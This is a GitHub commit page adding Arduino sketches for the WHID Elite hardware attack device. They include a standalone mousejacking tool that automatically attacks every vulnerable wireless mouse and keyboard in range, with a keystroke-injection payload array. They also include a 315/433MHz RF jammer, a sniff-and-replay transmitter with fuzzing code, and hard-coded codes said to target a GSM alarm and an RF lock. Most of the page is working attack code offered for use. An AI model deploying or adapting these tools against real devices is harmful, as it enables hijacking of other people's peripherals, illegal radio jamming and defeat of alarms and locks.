Skip to content
Permalink
Browse files

uploading sketches

  • Loading branch information
whid-injector committed Nov 12, 2019
1 parent 9e52a4b commit e7cf92d145d19401db33997c0374062b376ec27a

Large diffs are not rendered by default.

@@ -0,0 +1,8 @@
Sketch for using WHID Elite as Mousejacking Mass Pwner Standalone Tool.
Once flashed into WHIDElite, it will automatically search and attack all vulnerable Mice & Keyboards around.
BE CAREFUL!
This is based on uCMousejack[1].
[1] https://github.com/phikshun/uC_mousejack

P.S. This standalone mode doesn't need to be plugged into a PC to work. Is enough to plug the WHID Elite on a USB-battery-pack or use a bigger LiPo (e.g. 1500mAh) and enjoy a MouseDriving session. ;] https://twitter.com/LucaBongiorni/status/872023328487342080

@@ -0,0 +1,13 @@
uint8_t attack[] = {
0x08, 0x15, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x0c, 0x00, 0x00, 0x08, 0x00,
0x00, 0x1b, 0x00, 0x00, 0x13, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x12, 0x00,
0x00, 0x15, 0x00, 0x00, 0x08, 0x00, 0x00, 0x2c, 0x00, 0x00, 0x2d, 0x00,
0x00, 0x0e, 0x00, 0x00, 0x2c, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x17, 0x00,
0x00, 0x17, 0x00, 0x00, 0x13, 0x00, 0x02, 0x33, 0x00, 0x00, 0x38, 0x00,
0x00, 0x38, 0x00, 0x00, 0x09, 0x00, 0x00, 0x04, 0x00, 0x00, 0x0e, 0x00,
0x00, 0x08, 0x00, 0x00, 0x18, 0x00, 0x00, 0x13, 0x00, 0x00, 0x07, 0x00,
0x00, 0x04, 0x00, 0x00, 0x17, 0x00, 0x00, 0x08, 0x00, 0x00, 0x37, 0x00,
0x00, 0x11, 0x00, 0x00, 0x08, 0x00, 0x00, 0x17, 0x00, 0x00, 0x38, 0x00,
0x00, 0x1a, 0x00, 0x00, 0x11, 0x00, 0x00, 0x06, 0x00, 0x00, 0x38, 0x00,
0x00, 0x28, 0x00,
};
@@ -0,0 +1,6 @@
Sketch to test the Jamming feature.

You need to connect either 315/433MHz TX to D11, Vcc and GND.

BE CAREFUL.
Better run it on a Faraday Cage.
@@ -0,0 +1,14 @@
//### Pin D11 or Pin D7 <==> Data (315/433MHz TX)
//### Pin Vcc <==> Vcc (315/433MHz TX)
//### Pin GND <==> GND (315/433MHz TX)

void setup() {
//tone(11, 15000, 5000);
}

void loop() {
// Transmitter on pin #11 or pin #7
tone(11, 15000, 10000); // It generates a square wave Default:15000
//tone(7, 15000, 10000);
//tone(11, 15000);
}
@@ -0,0 +1,25 @@
/*
Example for receiving
https://github.com/sui77/rc-switch/
If you want to visualize a telegram copy the raw data and
paste it into http://test.sui.li/oszi/
*/

#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
Serial.begin(9600);
mySwitch.enableReceive(0); // (6) We use D7, which is INT6, atmega32u4 chip pin #1 ### https://web.archive.org/web/20140914105154/http://propaneandelectrons.com/blog/int6-on-arduino-leonardo-atmega32u4
} //(0) FF Pin 3, INT0

void loop() {
if (mySwitch.available()) {
output(mySwitch.getReceivedValue(), mySwitch.getReceivedBitlength(), mySwitch.getReceivedDelay(), mySwitch.getReceivedRawdata(),mySwitch.getReceivedProtocol());
//Decimal: 15532481 (24Bit) Binary: 111011010000000111000001
mySwitch.resetAvailable();
}
}
@@ -0,0 +1,72 @@
static const char* bin2tristate(const char* bin);
static char * dec2binWzerofill(unsigned long Dec, unsigned int bitLength);

void output(unsigned long decimal, unsigned int length, unsigned int delay, unsigned int* raw, unsigned int protocol) {

//Decimal: 15532481 (24Bit) Binary: 111011010000000111000001

const char* b = dec2binWzerofill(decimal, length);
Serial.print("Decimal: ");
Serial.print(decimal);
Serial.print(" (");
Serial.print( length );
Serial.print("Bit) Binary: ");
Serial.print( b );
// Serial.print(" Tri-State: ");
// Serial.print( bin2tristate( b) );
// Serial.print(" PulseLength: ");
// Serial.print(delay);
// Serial.print(" microseconds");
// Serial.print(" Protocol: ");
// Serial.println(protocol);
//
// Serial.print("Raw data: ");
// for (unsigned int i=0; i<= length*2; i++) {
// Serial.print(raw[i]);
// Serial.print(",");
// }
Serial.println();
Serial.println();
}

static const char* bin2tristate(const char* bin) {
static char returnValue[50];
int pos = 0;
int pos2 = 0;
while (bin[pos]!='\0' && bin[pos+1]!='\0') {
if (bin[pos]=='0' && bin[pos+1]=='0') {
returnValue[pos2] = '0';
} else if (bin[pos]=='1' && bin[pos+1]=='1') {
returnValue[pos2] = '1';
} else if (bin[pos]=='0' && bin[pos+1]=='1') {
returnValue[pos2] = 'F';
} else {
return "not applicable";
}
pos = pos+2;
pos2++;
}
returnValue[pos2] = '\0';
return returnValue;
}

static char * dec2binWzerofill(unsigned long Dec, unsigned int bitLength) {
static char bin[64];
unsigned int i=0;

while (Dec > 0) {
bin[32+i++] = ((Dec & 1) > 0) ? '1' : '0';
Dec = Dec >> 1;
}

for (unsigned int j = 0; j< bitLength; j++) {
if (j >= bitLength - i) {
bin[j] = bin[ 31 + i - (j - (bitLength - i)) ];
} else {
bin[j] = '0';
}
}
bin[bitLength] = '\0';

return bin;
}
@@ -0,0 +1,32 @@
/*
Simple example for receiving
https://github.com/sui77/rc-switch/
*/

#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
Serial.begin(4800);
mySwitch.enableReceive(0); // We use D7, which is INT6, atmega32u4 chip pin #1 ### https://web.archive.org/web/20140914105154/http://propaneandelectrons.com/blog/int6-on-arduino-leonardo-atmega32u4
}

void loop() {
if (mySwitch.available()) {

Serial.print("Received ");
Serial.print( mySwitch.getReceivedValue() );
Serial.print(" / ");
Serial.print( mySwitch.getReceivedBitlength() );
Serial.print("bit ");
Serial.print("Delay: ");
Serial.println( mySwitch.getReceivedDelay() );
Serial.print("Protocol: ");
Serial.println( mySwitch.getReceivedProtocol() );

mySwitch.resetAvailable();
}
}


@@ -0,0 +1,74 @@
/*
* Sniff ASK/OOK packet and Re-Transmit it after 10 Seconds.
* Based on RF Sniffer (C) Elia Yehuda 2014
*/

#include <RCSwitch.h>
// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 50
RCSwitch rfSwitch = RCSwitch();

void setup()
{
Serial.begin(4800);
// Receiver on interrupt INT0 (Pin #D3 of FF too)
rfSwitch.enableReceive(0);
// Transmitter on pin #11 or pin #7
rfSwitch.enableTransmit(11);
rfSwitch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
}

//Decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
static char b[33];
b[32] = '\0';
for ( int z = 0; z < 32; z++) {
b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
}
return b;
}

void process_rf_value(RCSwitch rfswitch)
{
char str[120];
unsigned long value;
value = rfswitch.getReceivedValue();
Serial.println(F("------------------------------------------- SNIFF & REPLAY -------------------------------------------"));
if (value) {
sprintf(str, "[O] [Packet Received] Binary: %s / Decimal: %010lu / %02d bit / Protocol = %d", tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
//sprintf(str, "[O] [Packet Received] Binary: %s / Bit Length: %02d bit", tobin32(value), rfswitch.getReceivedBitlength());
} else {
sprintf(str, "[o] Packet Received: Unknown encoding (0)");
}

Serial.println(str);
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 3 seconds..."));
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 2 seconds..."));
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 1 second..."));
delay(1000);
Serial.println(F("[O] BOOOM!"));
rfswitch.send(value, rfswitch.getReceivedBitlength());
//rfswitch.send(value+1, rfswitch.getReceivedBitlength()); //### PoC
//delay(1000);
// for (int i = 0; i <= 11; i++) {
// rfswitch.send(value + i, 24);
// Serial.print(F("Fuzzing: "));
// Serial.println(value + i);
// delay(500);
// }
Serial.println(F("[O] Packets Sent!"));
Serial.println(F("-----------------------------------------------------------------------------------------------------"));
// reset the switch to allow more data to come
rfswitch.resetAvailable();
}

void loop()
{
if (rfSwitch.available()) {
process_rf_value(rfSwitch);
}
}
@@ -0,0 +1,7 @@
Simple sketch to send an arbitrary binary sequence!
Transmitter on pin #11 or pin #7

For some reasons there is a bug in rcswitch library, which adds one zero more... so remove the last one from the binary you want to TX!!!
Example, the right signal is:
1010010111101011000001000 // original signal
101001011110101100000100 // to use (see! one zero less at the end)
@@ -0,0 +1,46 @@
/* Simple sketch to send an arbitrary binary sequence!
For some reasons there is a bug in rcswitch library, which adds one zero more... so remove the last one from the binary you want to TX!!!
Example, the right signal is:
1010010111101011000001000 // original signal
101001011110101100000100 // to use (see! one zero less at the end) */


#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();
int timeDelay = 135;

void setup() {
Serial.begin(4800);
Serial.println(F("[+] Botting Up..."));
// Transmitter on pin #11 or pin #7
mySwitch.enableTransmit(11); //Pin D11
// set protocol (default is 1, will work for most outlets)
// mySwitch.setProtocol(2);
// Optional set pulse length. (this must be set after protocol (if set). Otherwise is overridden).
//mySwitch.setPulseLength(456);
// Optional set number of transmission repetitions.
mySwitch.setRepeatTransmit(5);
}

void loop() {
// Use this to add manually specific HIGH or LOW pulses with specific length.
// int highLength = 4;
// int lowLength = 18;
// digitalWrite(11, HIGH);
// delayMicroseconds(highLength*timeDelay);
// digitalWrite(11,LOW);
// delayMicroseconds(lowLength*timeDelay);

// #### For some reasons there is a bug... rcswitch adds one zero more... so remove the last one from the signal binary!!!
// ### Example, the right signal is
// 1010010111101011000001000 // original signal
// 101001011110101100000100 //to use (see! one zero less at the end)
Serial.println(F("[+] Sending Packets!"));

//mySwitch.send("101001011110101100000100"); // GSM Alarm at 433MHz
mySwitch.send("010101010101010100001100"); // RFID RFLock at 315MHz
//mySwitch.send("011101101101010011101000"); // Crane Packet?!

delay(2000);
}
@@ -0,0 +1,4 @@
WHID_TestSuite.ino is a testing suite, based on the existing one from FONA library, that allows to test if the SIM800L works properly.
I added also the command K which is used to check if the HID emulation works properly on Windows. It will run usual calc.exe
Once uploaded the sketch, open SerialMonitor. SIM800 will boot and you can type ? To see the commands available.
TODO: Finish to add k command and all other possible unit-tests to check WHID Elite's functionalities. E.g. spy, askTX, askRX, etc...

0 comments on commit e7cf92d

Please sign in to comment.
You can’t perform that action at this time.